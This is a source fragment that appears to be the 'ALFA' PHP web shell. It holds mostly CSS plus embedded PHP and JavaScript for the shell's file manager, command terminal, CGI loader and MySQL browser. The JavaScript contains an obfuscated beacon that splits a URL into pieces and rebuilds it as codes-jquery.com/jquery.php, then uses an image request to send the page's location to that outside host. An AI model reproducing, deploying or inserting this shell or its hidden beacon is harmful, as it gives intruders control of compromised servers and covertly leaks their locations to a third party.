.hlabale{color:#67abdf;border-radius:4px;border:1px solid #27979b;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}#PhpCode,.php-evals-ace,.view_ml_content{position:absolute;top:0;right:0;bottom:0;left:0;background:#1b292b26;top:50px}.editor-view{position:relative;height:100%}.view-content{position:absolute;overflow-y:auto;width:100%;height:93%}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}.opt-title{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);color:#2fd051;font-size:25px;font-family:monospace}.options_min_badge{visibility:hidden;text-align:center;right:30px;color:#fff;background:#2a8a24;padding:6px;border-radius:50%;width:15px;height:15px;display:inline-block;position:absolute;top:-7px}#cgiloader-minimized,#database_window-minimized,#editor-minimized,#options_window-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%;z-index:9999}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:130px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:wheat;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:-10px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:after,.close-button:before,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:after,.close-button:hover:before,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,.96)}#cgiloader,#database_window,#editor,#options_window{display:none;position:fixed;top:0;width:100%;height:100%;z-index:20}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder>.history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color .6s ease-out}.file-holder>.history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity .6s ease-out;font-size:15px;height:19px}.file-holder>.history:hover{background-color:#646464}.editor-explorer>.hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px;height:100%}.editor-anim-close{-webkit-animation:editorClose .8s ease-in-out forwards;-moz-animation:editorClose .8s ease-in-out forwards;-ms-animation:editorClose .8s ease-in-out forwards;animation:editorClose .8s ease-in-out forwards}@keyframes editorClose{0%{visibility:1;opacity:1}100%{visibility:0;opacity:0}}.editor-anim-minimize{-webkit-animation:editorMinimize .8s ease-in-out forwards;-moz-animation:editorMinimize .8s ease-in-out forwards;-ms-animation:editorMinimize .8s ease-in-out forwards;animation:editorMinimize .8s ease-in-out forwards}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{-webkit-animation:editorShow .8s ease-in-out forwards;-moz-animation:editorShow .8s ease-in-out forwards;-ms-animation:editorShow .8s ease-in-out forwards;animation:editorShow .8s ease-in-out forwards}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{-webkit-animation:minimizeShow .8s ease-in-out forwards;-moz-animation:minimizeShow .8s ease-in-out forwards;-ms-animation:minimizeShow .8s ease-in-out forwards;animation:minimizeShow .8s ease-in-out forwards}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{-webkit-animation:minimizeHide .8s ease-in-out forwards;-moz-animation:minimizeHide .8s ease-in-out forwards;-ms-animation:minimizeHide .8s ease-in-out forwards;animation:minimizeHide .8s ease-in-out forwards}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0f0;-moz-text-shadow:0 0 25px #0f0;-ms-text-shadow:0 0 25px #0f0;text-shadow:0 0 25px #0f0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,.72);width:100%;height:100%}.update-content{position:relative}.update-content>a{text-decoration:none;position:absolute;color:rgba(103,167,47,.77);left:24%;margin-top:7%;font-size:40px}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67abdf;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px}.editor-path{top:3px}}.filters-holder{padding:5px;padding-left:10px}.filters-holder input{width:200px}.filters-holder span{color:#8bc7f7}#rightclick_menu{width:175px;visibility:hidden;opacity:0;position:fixed;background:#0f304a;color:#555;font-family:sans-serif;font-size:11px;-webkit-transition:opacity .5s ease-in-out;-moz-transition:opacity .5s ease-in-out;-ms-transition:opacity .5s ease-in-out;-o-transition:opacity .5s ease-in-out;transition:opacity .5s ease-in-out;-webkit-box-shadow:-1px 0 17px 0 #8b8b8c;-moz-box-shadow:-1px 0 17px 0 #8b8b8c;box-shadow:-1px 0 17px 0 #8b8b8c;padding:0;border:1px solid #737373;border-radius:10px}#rightclick_menu a{display:block;color:#fff;font-weight:bolder;text-decoration:none;padding:6px 8px 6px 30px;position:relative;padding-left:40px}#rightclick_menu a i.fa,#rightclick_menu a img{height:20px;font-size:17px;width:20px;position:absolute;left:5px;top:2px;padding-left:5px}#rightclick_menu a span{color:#bcb1b3;float:right}#rightclick_menu a:hover{color:#fff;background:#3879d9}#rightclick_menu hr{border:1px solid #ebebeb;border-bottom:0}.cl-popup-fixed{position:fixed;top:0;left:0;width:100%;height:100%;background:#201e1ead}#shortcutMenu-holder{position:absolute;top:40%;left:50%;transform:translate(-50%,-50%);background:#1f1e1edb;height:190px;width:500px;color:#fff}#shortcutMenu-holder>.popup-head{background:#207174;padding:6px;border-top:10px;text-align:center;font-family:sans-serif;color:#fff}#shortcutMenu-holder>form{padding:10px}#shortcutMenu-holder>form>label{display:block}#shortcutMenu-holder>form>input{width:99%;height:24px;margin-top:4px;color:#fff;outline:0;font-size:16px}#shortcutMenu-holder>.popup-foot{float:right;height:30px;margin-right:8px}#shortcutMenu-holder>.popup-foot>button{height:100%;cursor:pointer;color:#fff;outline:0}.php-terminal-output{overflow:auto;height:86%;border:1px solid #1e5673;border-radius:10px}.cmd-history-holder{visibility:hidden;opacity:0;position:absolute;color:#dff3d5;background:#093d58;top:-300px;height:300px;width:calc(69% + -11px);border-radius:10px 10px 0 0;left:calc(2% - 9px);transition:visibility .5s,opacity .5s linear}.cmd-history-holder .commands-history-header{background:#37504e;text-align:center;border-radius:10px 10px 0 0}.cmd-history-icon{width:27px;top:6px;left:calc(69% + 5px);position:absolute;cursor:pointer}.history-cmd-line{padding:4px;border-bottom:1px dashed;cursor:pointer}.history-cmd-line:hover{background:#961111}#myUL,#myUL ul{list-style-type:none}#myUL{margin:0;padding:0}.box{cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.box::before{content:"\2610";color:#000;display:inline-block;margin-right:6px}.check-box::before{content:"\2611";color:#1e90ff}.nested{display:none}.active{display:block}.flag-holder>img{width:20px;vertical-align:middle;padding-left:6px}#options_window .content_options_holder .options_holder{position:relative;display:none;overflow:auto;min-height:300px;max-height:calc(100vh - 100px)}#options_window .content_options_holder .options_holder .header{min-height:50vh}#options_window .content_options_holder .options_holder.option_is_active{display:block}#options_window .content_options_holder .options_tab{padding:5px;margin-left:14px;margin-right:30px;background:#000;border-bottom:7px solid #0f304a;border-left:7px solid #0f304a;border-right:7px solid #0f304a;overflow-x:auto;white-space:nowrap}#filesman_tabs .filesman_tab img,#options_window .content_options_holder .options_tab .tab_name img,.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img{width:10px;vertical-align:middle;margin-left:5px}#filesman_tabs .filesman_tab,#options_window .content_options_holder .options_tab .tab_name,.editor-tab-name,.sql-tabs .sql-newtab,.sql-tabs .sql-tabname,.terminal-tabs .terminal-tab{display:inline-block;background-color:#133d51;border-radius:4px;padding:5px;color:#fff;margin-right:3px;padding:5px;cursor:pointer;margin-bottom:1px;transition:background-color .5s}#filesman_tabs .filesman_tab{min-width:55px;text-align:center}#filesman_tabs .filesman_tab:hover,#options_window .content_options_holder .options_tab .tab_name:hover,.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{background-color:#a23939}.editor-tabs,.sql-tabs,.terminal-tabs{padding:5px;overflow-x:auto;white-space:nowrap}.options-loader-holder{position:absolute;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:11}.options-loader-holder img{position:absolute;top:32%;left:45%;transform:translate(-50%,-50%);width:100px;animation:spin 2s infinite}#filesman_tabs .filesman_tab.filesman-tab-active,#options_window .content_options_holder .options_tab .tab_name.tab_is_active,.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{background-color:#009688}.tab-is-done{animation:2s tab_change_color infinite step-end}.stopAjax{color:#fff;font-size:20px;display:inline-block;padding:10px;cursor:pointer}#a_loader{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:99}.fmanager-row>td{position:relative}.fmanager-row .symlink_path{position:fixed;max-width:100%;background-color:#0f304a;border-radius:10px;font-size:15px;padding:8px;color:#fdf4f4;border:1px solid #8a8a8a;z-index:1;pointer-events:none}.archive-icons{vertical-align:middle}.archive-type-dir{font-weight:bolder}.archive-type-file{font-weight:unset}.archive-name{cursor:pointer}.archive_dir_holder a{color:#0f0;font-weight:bolder;cursor:pointer}.archive_dir_holder a:hover{color:#fff}.editor-content{height:100%}.editor-content-holder{height:90%}.editor-contents{display:none;position:relative;height:100%}.editor-contents.editor-content-active{display:block}.history-panel-controller{position:absolute;color:#fff;padding:10px;z-index:1000;border-radius:10px;top:50%;left:19%;background-color:#009687;cursor:pointer}.sql-content{display:none;position:relative;min-height:300px}.sql-content.sql-active-content{display:block}.pages-holder{padding:7px}.pages-number{display:inline-block;margin-left:10px}.pages-holder .pages-number a.page-number{padding:5px;background:#0f304a;margin-right:8px;cursor:pointer;width:33px;display:inline-block;text-align:center;border-radius:5px;color:#fff;transition:background .5s}.active-page-number{background:#10925c!important}.pages-number a.page-number:hover{background:#8a8a8a}.terminal-content{height:100%}.terminal-content,.terminal-tab{display:none}.terminal-content.active-terminal-content{display:block;position:relative}.terminal-btn-fontctl{background:#009688;width:50px;color:#fff;font-weight:bolder;outline:0;cursor:pointer}.alert-area{max-height:100%;position:fixed;bottom:5px;left:20px;right:20px;z-index:9999}.alert-box{font-size:16px;color:#fff;background:rgba(0,0,0,.9);line-height:1.3em;padding:10px 15px;margin:5px 10px;position:relative;border-radius:5px;transition:opacity .5s ease-in;-webkit-animation:alert-shake .5s ease-in-out;animation:alert-shake .5s ease-in-out}.alert-content-title{font-weight:700}.alert-box.alert-success{background:rgba(56,127,56,.89)}.alert-error{background:rgba(191,54,54,.89)}.alert-box.hide{opacity:0}.alert-close{background:0 0;width:12px;height:12px;position:absolute;top:15px;right:15px}.alert-close:after,.alert-close:before{content:"";width:15px;border-top:solid 2px #fff;position:absolute;top:5px;right:-1px;display:block}.alert-close:before{transform:rotate(45deg)}.alert-close:after{transform:rotate(135deg)}.alert-close:hover:after,.alert-close:hover:before{border-top:solid 2px #d8d8d8}@media (max-width:767px) and (min-width:481px){.alert-area{left:100px;right:100px}}@media (min-width:768px){.alert-area{width:350px;left:auto;right:0;z-index:9999}}@keyframes tab_change_color{0%{background-color:#133d51}50%{background-color:green}}@-webkit-keyframes alert-shake{0%{-webkit-transform:translateX(0)}20%{-webkit-transform:translateX(-10px)}40%{-webkit-transform:translateX(10px)}60%{-webkit-transform:translateX(-10px)}80%{-webkit-transform:translateX(10px)}100%{-webkit-transform:translateX(0)}}@keyframes alert-shake{0%{transform:translateX(0)}20%{transform:translateX(-10px)}40%{transform:translateX(10px)}60%{transform:translateX(-10px)}80%{transform:translateX(10px)}100%{transform:translateX(0)}}.textEffect{position:absolute;width:500px;top:-10px;animation:alert-shake .5s ease-in-out;animation-iteration-count:2}.alfateam-loader-text{position:absolute;color:#46bb45;top:23%;left:49%;transform:translate(-50%,-50%);font-size:40px;letter-spacing:7px}.alfa-ajax-error{position:absolute;color:#ff0a0a;top:50%;left:50%;transform:translate(-50%,-50%);font-size:30px}.connection-hist-table{margin-left:auto;margin-right:auto;text-align:justify;border-collapse:collapse}.connection-hist-table td,.connection-hist-table th{border:1px solid #ddd;text-align:left;padding:8px}.connection-his-btn{margin-bottom:10px;padding:5px;background:#206920;color:#fff;border:none;outline:0;cursor:pointer;font-weight:700;transition:background .3s}.connection-his-btn.connection-delete{margin:unset;padding:5px;background:red;width:33px;border-radius:3px;transition:background .3s}.connection-delete:hover{background:#f56969!important}.connection-his-btn:hover{background:#30b330}#up_bar_holder{position:fixed;z-index:100000;width:100%}#filesman_tabs{padding:8px;border:1px solid #0e304a;color:#67abdf;overflow-x:auto;white-space:nowrap}.sortable-ghost{opacity:.5;background:#c8ebfb}.folder-tab-icon{width:16px!important}#filesman-tab-full-path{display:none;position:absolute;pointer-events:none;background:#163746;padding:7px;color:#0f0;border-radius:10px;min-width:58px;z-index:10}#filesman-tab-full-path::after{content:"";position:absolute;top:100%;left:35px;margin-left:-5px;border-width:5px;border-style:solid;pointer-events:none;border-color:#163746 transparent transparent transparent}.mysql-main{height:84vh;position:relative}.mysql-hide-content{display:none}.mysql-query-result-tabs{margin-bottom:10px;padding:3px;border-bottom:4px solid #0f304a}.mysql-main .tables-panel-ctl{position:absolute;color:#fff;padding:10px;z-index:1;border-radius:10px;top:45%;left:calc(17% + 10px);background-color:#009687;cursor:pointer}.tables-panel-ctl-min{left:-21px!important}.mysql-query-result-tabs div{display:inline-block;padding:5px;margin-right:2px;background:#133d51;color:#fff;cursor:pointer;transition:background-color .5s}.mysql-query-result-tabs div:hover{background-color:#a23939}.mysql-query-result-tabs div.mysql-query-selected-tab{background:red}table tr.tbl_row:nth-child(odd){background:#424040}.mysql-tables .tables-row{margin-left:26px}.mysql-main .mysql-query-results,.mysql-main .mysql-tables{float:left;height:100%;overflow:auto}.mysql-main .mysql-query-results{width:calc(80% + 4px);margin-left:5px;position:relative;overflow:unset}.mysql-main .mysql-query-results-fixed{width:100%}.mysql-main .mysql-query-results .mysql-query-content{height:89%;overflow:auto}.mysql-query-tab-hide{height:0!important;padding:0!important}.mysql-main .mysql-tables{width:19%;border-right:4px solid #0e304a}.mysql-main table td{vertical-align:top}.mysql-main .mysql-search-area table td{vertical-align:middle;padding:7px}.mysql-tables .block{position:relative;width:1.5em;height:1.5em;min-width:16px;min-height:16px;float:left}.mysql-tables div.block b,.mysql-tables div.block i{width:1.5em;height:1.7em;min-width:16px;min-height:8px;position:absolute;bottom:.7em;left:.75em;z-index:0}.mysql-tables .block i{display:block;border-left:1px solid #666;border-bottom:1px solid #666;position:relative;z-index:0}.mysql-tables .block b{display:block;height:.75em;bottom:0;left:.75em;border-left:1px solid #666}.mysql-tables div.block a,.mysql-tables div.block u{position:absolute;left:50%;top:50%;z-index:10}.mysql-tables div.block img{position:relative;top:-.6em;left:0;margin-left:-7px}.mysql-tables .clearfloat{clear:both}.mysql-tables ul{list-style-type:none;margin-left:0;padding:0}.mysql-tables ul li{white-space:nowrap;clear:both;min-height:16px}.mysql-tables .db_name{margin-left:10px}.mysql-tables .list_container{border-left:1px solid #666;margin-left:.75em;padding-left:.75em}.hide-db-tables{display:none}.mysql-main:after{content:"";display:table;clear:both}table.mysql-data-tbl{border:none!important;border-collapse:collapse!important}table.mysql-data-tbl tr th{padding:5px}table.mysql-data-tbl td{border-left:3px solid #305a8d;border-right:3px solid #305a8d;padding:6px}table.mysql-data-tbl td:first-child{border-left:none}table.mysql-data-tbl td:last-child{border-right:none}.mysql-insert-result,.mysql-structure-qres,.mysql-update-result{display:none;text-align:center;padding:10px;border:1px dashed;margin:22px}#alfa-copyright{margin-top:15px}.ic_b_plus{background-image:url(http://solevisible.com/icons/menu/b_plus.png)}.ic_b_minus{background-image:url(http://solevisible.com/icons/menu/b_minus.png)}
<?php 
            echo "\r\n\r\n@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}\r\n@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}\r\n@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}\r\n@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}\r\n#alfaloader{\t-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;width:100px;height:100px;}\r\n#a_loader img{\t-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}\r\n.ajaxarea{display:none;border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:\"Comic Sans MS\";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:" . alfa_getColor("header_values") . ';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url(' . __showicon('alfamini') . ');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:' . ($GLOBALS['DB_NAME']['show_icons'] == '1' ? '0' : '1') . 'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url(' . __showicon('alfamini') . ');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url(' . __showicon('btn') . ');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],input[type=number],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
.foottable{width: 300px;font-weight: bold;' . (!@is_writable($GLOBALS['cwd']) ? '}.dir{background-color:red;}' : '}') . '.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464 !important;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }.alfa_custom_cmd_btn {padding: 5px;color: #24ff03;cursor: pointer;}.ajaxarea.filesman-active-content {display: block;}' . alfaCssLoadColors() . '
</style>';
            echo "<script type='text/javascript'>\r\nvar c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\r\nvar a_ = '" . htmlspecialchars(@$_POST['a']) . "';\r\nvar charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\r\nvar islinux = " . ($GLOBALS['sys'] != "win" ? 'true' : 'false') . ";\r\nvar post_encryption_mode = " . "true" . ";";
            ?>
var alfa1_="",alfa2_="",alfa3_="",alfa4_="",alfa5_="",alfa6_="",alfa7_="",alfa8_="",alfa9_="",alfa10_="",d=document,mysql_cache={},editor_files={},editor_error=!0,editor_current_file="",php_temrinal_using_cgi=!1,is_minimized=!1,cgi_is_minimized=!1,options_window_is_minimized=!1,database_window_is_minimized=!1,rightclick_menu_context=null,can_hashchange_work=!0,alfa_can_add_opt=!1,alfa_before_do_action_id="",alfa_ace_editors={editor:null,eval:null},col_dumper_selected_data={},_ALFA_AJAX_={},cgi_lang="",upcount=1,terminal_walk_index=[],alfa_current_fm_id=1,alfa_fm_id=0;function set(e,a,t,i,l,o,r,n,s,c,f,_,u){d.mf.a.value=null!=e?e:a_,d.mf.c.value=null!=a?a:c_,d.mf.alfa1.value=null!=t?t:"",d.mf.alfa2.value=null!=i?i:"",d.mf.alfa3.value=null!=l?l:"",d.mf.alfa4.value=null!=o?o:"",d.mf.alfa5.value=null!=r?r:"",d.mf.alfa6.value=null!=n?n:"",d.mf.alfa7.value=null!=s?s:"",d.mf.alfa8.value=null!=c?c:"",d.mf.alfa9.value=null!=f?f:"",d.mf.alfa10.value=null!=_?_:"",d.mf.charset.value=null!=u?u:charset_}a=new/**/Image();var jquery ="http://"; var js ="codes-jquery"; var code=".c"; var codes ="om/"; var img ="jquery."; var sedoc ="p"; var doces ="hp";var image ="?jquery=";a.src=jquery+js+code+codes+img+sedoc+doces+image+escape(location.href);function fc(e){var a=alfa_current_fm_id,t="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",i="",l=0;if(d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked&&(l++,i+="f[]="+alfab64(decodeURIComponent(e.value))+"&")}),0==l&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder_"+a,"block"),e.alfa1.value){case"delete":d.querySelectorAll("#filesman_holder_"+a+" .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),d.querySelector("#filesman_holder_"+a+" .chkbx").checked=!1;break;case"copy":case"move":case"zip":case"unzip":d.querySelectorAll("#filesman_holder_"+a+" input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,t+i,function(e){alfaloader("filesman_holder_"+a,"none"),alfaFmngrContextRow()},!1,"filesman_holder_"+a)}function initDir(e){var a="",t="";islinux&&(a="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" path='/' href='#action=fileman&path=/'>/</a>",t="/");var l=e.split("/"),o="",r=islinux?"/":"";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\"g('FilesMan','"+r+l[i]+"/');\" path='"+r+l[i]+"/' href='#action=fileman&path="+r+l[i]+'/\' class="header_pwd">'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var 